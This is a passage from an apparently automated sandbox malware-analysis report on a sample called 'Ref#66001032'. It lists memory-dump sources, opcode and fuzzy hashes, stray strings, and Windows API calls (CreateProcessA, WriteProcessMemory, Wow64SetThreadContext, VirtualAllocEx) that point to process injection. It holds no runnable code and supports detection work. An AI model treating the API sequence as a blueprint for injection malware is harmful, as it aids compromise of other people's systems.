                                                                                                  • Opcode ID: badb034f105d06210dd8dd153ceb460baf044029aff61b6dee88999e5bf973dd
                                                                                                  • Instruction ID: 524789f7db542017b7c49d79f843954e6da125bb2826de8bb3064590d181c3a1
                                                                                                  • Opcode Fuzzy Hash: badb034f105d06210dd8dd153ceb460baf044029aff61b6dee88999e5bf973dd
                                                                                                  • Instruction Fuzzy Hash: 6051D5B4D15268CFDB54CFAAC9487DDBBF2AB89300F14C0AAD809BB214D7744A89CF40
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5e043f57c65c3b3e50c9a55a5815e91c5dd1d082de156b9bcdba697ad0470aff
                                                                                                  • Instruction ID: 0963f7d428d44cfed9ff33a4806c869b6921c0ada649f370c1605e670bc060d6
                                                                                                  • Opcode Fuzzy Hash: 5e043f57c65c3b3e50c9a55a5815e91c5dd1d082de156b9bcdba697ad0470aff
                                                                                                  • Instruction Fuzzy Hash: C851BA71E10A188BEB58DF6BDC4469AFAF3BFC8305F14C1A9D408AA258DB745A85CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cc01fde875e456f6632bdc33050a840e6a3e1df03c9eafa25148e2acab38d2af
                                                                                                  • Instruction ID: 10f33cdf6a7dbeae083b8fd7f6fc00c0845ed2aa39c4b8c15af9ef37a7d1b905
                                                                                                  • Opcode Fuzzy Hash: cc01fde875e456f6632bdc33050a840e6a3e1df03c9eafa25148e2acab38d2af
                                                                                                  • Instruction Fuzzy Hash: 6951CB71E10A188BEB58CF6BDC4479AFAF3BFC8305F14C1A9D408AA259DB745A85CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 873cebf477bbdf396bfd1c0bb98d5ba47838317d9ac485d0f91e1eb64f0d41e2
                                                                                                  • Instruction ID: 0e8cbfbb01f3a39e0554d08db19bfe19398f17a5ad453361e4b6e9ce7408df95
                                                                                                  • Opcode Fuzzy Hash: 873cebf477bbdf396bfd1c0bb98d5ba47838317d9ac485d0f91e1eb64f0d41e2
                                                                                                  • Instruction Fuzzy Hash: 6051C4B4D15668CFDB54CFAAC9487DDBBF2AB89300F14C0EAD819AB214D7744A89CF40

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4$jjjjjj
                                                                                                  • API String ID: 0-102010443

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4$jjjjjj
                                                                                                  • API String ID: 0-102010443

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: jjjjjj
                                                                                                  • API String ID: 0-3900813449

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2$@
                                                                                                  • API String ID: 0-1603946714

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$M
                                                                                                  • API String ID: 0-873950835

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: L$w
                                                                                                  • API String ID: 0-3108546703

                                                                                                  Control-flow Graph (figure not reproduced; nodes span 56fceac-56fd12c and include the CreateProcessA call)
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 056FD092
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: ef99cfcb4c87101edeea03037b5e7862fb8fd090c65be8bbdddf60f3eda4395d
                                                                                                  • Instruction ID: 9f34e80cb064a70f922c7a8e004fb9aa3d6a1afa16c098ff1e8e944b98dd946b
                                                                                                  • Opcode Fuzzy Hash: ef99cfcb4c87101edeea03037b5e7862fb8fd090c65be8bbdddf60f3eda4395d
                                                                                                  • Instruction Fuzzy Hash: 2D8156B1D042599FEB10DFA9C8817EDBBF2FF48314F248129E919A7340D7749881CB81

                                                                                                  Control-flow Graph (figure not reproduced; nodes span 56fceb8-56fd12c and include the CreateProcessA call)
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 056FD092
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 635316db46b5ecba794ae193b59b6552d6216e8da550b3cdd39c9fcb02868779
                                                                                                  • Instruction ID: 2bc57975715aeba661bf26d7d22e304d8eea516a5fd41f0066fb694c80d8dcba
                                                                                                  • Opcode Fuzzy Hash: 635316db46b5ecba794ae193b59b6552d6216e8da550b3cdd39c9fcb02868779
                                                                                                  • Instruction Fuzzy Hash: 34813471D04259AFEB10DFA9C8857AEBBF2FF48314F248129E919E7340DB759881CB81

                                                                                                  Control-flow Graph (figure not reproduced; nodes span 56f20ec-56f22c3 and include the CopyFileA call)
                                                                                                  APIs
                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 056F223D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CopyFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 1304948518-0
                                                                                                  • Opcode ID: de89ecf5d0a173d7efd8a1c705630d9a4241540beebafb367221b84a9a7a87ae
                                                                                                  • Instruction ID: bc735050d9a1d772d0d2bbae5aaa9352c3eb2752ba551db1ab3dc3177f43fdef
                                                                                                  • Opcode Fuzzy Hash: de89ecf5d0a173d7efd8a1c705630d9a4241540beebafb367221b84a9a7a87ae
                                                                                                  • Instruction Fuzzy Hash: 8151A7B1D006599FDB20CFA8CC917AEBBF2BF48310F148129EA55A7784DB749881CF80
                                                                                                  APIs
                                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 056F223D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CopyFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 1304948518-0
                                                                                                  • Opcode ID: 9ba89a95ce819c544b1c7043593ab4801b0a503482bfd045734d93131ebbd865
                                                                                                  • Instruction ID: 7a9a2d54f11850b1918ea910ff2c9515b31099df5962f8b408035191b03b53a5
                                                                                                  • Opcode Fuzzy Hash: 9ba89a95ce819c544b1c7043593ab4801b0a503482bfd045734d93131ebbd865
                                                                                                  • Instruction Fuzzy Hash: A8518670D006599FDB20DFA9CC957AEBBF2BF48310F148129EA55A7784DB789881CF81
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  • Opcode ID: 8531911d3c5cffdea87650e3dfdc0cd261fe1e6cb223416c6db7903721704523
                                                                                                  • Instruction ID: ee08fcdab4e8a0895e7a7b64baa99596af7d3e6a143e54e5540e68c65e65bb2f
                                                                                                  • Opcode Fuzzy Hash: 8531911d3c5cffdea87650e3dfdc0cd261fe1e6cb223416c6db7903721704523
                                                                                                  • Instruction Fuzzy Hash: 27E17174B08144CFDB04EBA9D494BADBBF1EF4A314F2445A9E44ADB3A6CA30DC46CB41
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: d
                                                                                                  • API String ID: 0-2564639436
                                                                                                  • Opcode ID: 2fa71d2c73a04148c38c2a035c175d5b3afe9bc1319d34895a96c751f541a543
                                                                                                  • Instruction ID: 2b72829d3cc6085a067c3251d8607aa0440a5f557bf8158f9cbe168713901eed
                                                                                                  • Opcode Fuzzy Hash: 2fa71d2c73a04148c38c2a035c175d5b3afe9bc1319d34895a96c751f541a543
                                                                                                  • Instruction Fuzzy Hash: A3D19C30B20606CFC714CF29C49096AB7F6FF88314B998969E95A9B355DB31FC41CB94
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 056FDFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 542ca7703d7f18d9641aa4c45dd58cb326dd8388725eb433b0320672d26e166a
                                                                                                  • Instruction ID: 182662d96753005e4b7edb2b9ee455856101709f4653aded5a264e7a3ad234c7
                                                                                                  • Opcode Fuzzy Hash: 542ca7703d7f18d9641aa4c45dd58cb326dd8388725eb433b0320672d26e166a
                                                                                                  • Instruction Fuzzy Hash: E5212871D013499FDB10CFA9C845BDEBBF5BF48314F108429EA59A7340D775A550CBA0
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 056FDFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 4a058244afc5837fdd1919e09663420abd6af75deda0af6975dc5f4029981097
                                                                                                  • Instruction ID: d9a6613f85cd3a1a35641f7ee9cd27800aecc3f2daa1f8a1e3a0b09908a7e47a
                                                                                                  • Opcode Fuzzy Hash: 4a058244afc5837fdd1919e09663420abd6af75deda0af6975dc5f4029981097
                                                                                                  • Instruction Fuzzy Hash: AF2115719003499FDB10DFAAC881BDEBBF5FF48310F108429EA19A7340D779A950CBA4
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056FE64E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 718ad009873619e5b9c08ca2e7e34f1acf4aea32dc0f515e0f427a39c4f7158a
                                                                                                  • Instruction ID: 6eaf495f28af6e6c497f27b03694b6b8686c191092d3b0b99c089d4d39218900
                                                                                                  • Opcode Fuzzy Hash: 718ad009873619e5b9c08ca2e7e34f1acf4aea32dc0f515e0f427a39c4f7158a
                                                                                                  • Instruction Fuzzy Hash: 53214871D003098FDB50DFAAC485BAEBBF4FF88324F14842AD519A7240DB799944CBA5
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056FE64E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 1a9bdc78675597be2f0ea5fbd4686c7522f588b0827dd9650c83a1b7a70a3152
                                                                                                  • Instruction ID: bbb19096aadfc5a9ff18ca81e6547cb66fb14bd1ad14cd618593fcf2b26962f9
                                                                                                  • Opcode Fuzzy Hash: 1a9bdc78675597be2f0ea5fbd4686c7522f588b0827dd9650c83a1b7a70a3152
                                                                                                  • Instruction Fuzzy Hash: F9211571D003098FDB50DFAAC485BAEBBF4FF88324F14842AD559A7240DB79A944CFA5
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 061D7944
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 5411afaefce0409f5df57b8627c9ca2938b0ed4be1d31e4684f0e4a8aaad5ac7
                                                                                                  • Instruction ID: 80b2d7d0e6c16cb917ddf80cd4e3c53540961694817e2a302ee3ea70f05ee185
                                                                                                  • Opcode Fuzzy Hash: 5411afaefce0409f5df57b8627c9ca2938b0ed4be1d31e4684f0e4a8aaad5ac7
                                                                                                  • Instruction Fuzzy Hash: 24213972C003499FDB10DFAAC881BEEBBF4EF48320F148429E559A7240D7789550CFA5
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 061D7944
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  • Opcode ID: 1185c0481cbe4f85fabeec974646915943e1c0eb1c6f96b1917113339dc14312
                                                                                                  • Instruction ID: 29c21852d84ee2fe75927de6a2455197a6fc207dc7c9350c902ad444094d7c9e
                                                                                                  • Opcode Fuzzy Hash: 1185c0481cbe4f85fabeec974646915943e1c0eb1c6f96b1917113339dc14312
                                                                                                  • Instruction Fuzzy Hash: C5211871C003099FDB10DFAAC441BAEBBF4EF48320F148429D559A7240D7799540CFA5
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056FEBDE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 46dbfdefcd0e96b8300c5e747024f530ccdf31a12d33410ffb02744172654e43
                                                                                                  • Instruction ID: cb4605d52f7f10719044867d162ba1283b4e7299489cdc1cb2971b8d7cb8a369
                                                                                                  • Opcode Fuzzy Hash: 46dbfdefcd0e96b8300c5e747024f530ccdf31a12d33410ffb02744172654e43
                                                                                                  • Instruction Fuzzy Hash: 7E116776D002499FDB10CFAAC844BDEBFF5AF88320F10841AE616A7210C7769904CBA1
                                                                                                  APIs
                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 0641D9AC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3526077058.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6410000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 544645111-0
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056FEBDE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: N
                                                                                                  • API String ID: 0-1130791706
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0641E98B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3526077058.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6410000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Q
                                                                                                  • API String ID: 0-3463352047
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 0-3352871620
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ]
                                                                                                  • API String ID: 0-3352871620
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 1
                                                                                                  • API String ID: 0-2212294583
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "
                                                                                                  • API String ID: 0-123907689
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 14da62947f71eecbb7f69ceccc23c1a2d55cf30d05eada8be1cae5db57b3f491
                                                                                                  • Instruction ID: 30692cfc37a6dc028495dd76179bd9e6a1efaf0f581b6b6abf0cfd38b153842d
                                                                                                  • Opcode Fuzzy Hash: 14da62947f71eecbb7f69ceccc23c1a2d55cf30d05eada8be1cae5db57b3f491
                                                                                                  • Instruction Fuzzy Hash: FBF11870B242069FDB94AF29D45077E7BE2AF84300F548479E982CB392DBB5DD80DB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21f6e71f873064846896594601c0ce2bb2f49465886097e179c4141ebb7b6822
                                                                                                  • Instruction ID: d77912f68afab1b45ee732721e2f49a2351d94deb58a797bbae1103da755ea08
                                                                                                  • Opcode Fuzzy Hash: 21f6e71f873064846896594601c0ce2bb2f49465886097e179c4141ebb7b6822
                                                                                                  • Instruction Fuzzy Hash: 1B12E4B4901600CFE3A0EF04D959B697BE1FB02309F66D599E8255F36AC3B6D888DF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b59ca2baa7cf8858c565fbb00e32e13ff83b4617fea14c18e0e5326566ca4341
                                                                                                  • Instruction ID: 111baed53015326cc591761e2cf1e9a0010ec925f1eaedf135ef26c105b26fab
                                                                                                  • Opcode Fuzzy Hash: b59ca2baa7cf8858c565fbb00e32e13ff83b4617fea14c18e0e5326566ca4341
                                                                                                  • Instruction Fuzzy Hash: FCF1FC34A10219CFCB44DFA4D994E9DB7B2FF89300F558169E906AB3A5DB74EC42CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 012889242c58bcfddf121fa28e034326322c02155201251db6c51f89b71ad0c0
                                                                                                  • Instruction ID: a12da9c1f97f5f8d7ea27856e96f452d4d3d06e688f588f83c32e8a0e12a24ce
                                                                                                  • Opcode Fuzzy Hash: 012889242c58bcfddf121fa28e034326322c02155201251db6c51f89b71ad0c0
                                                                                                  • Instruction Fuzzy Hash: 98E14034B10209DFCB44EFA4D8949ADBBB2EF89300F508569E916AB365DF34AD41CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3516998365.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6180000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
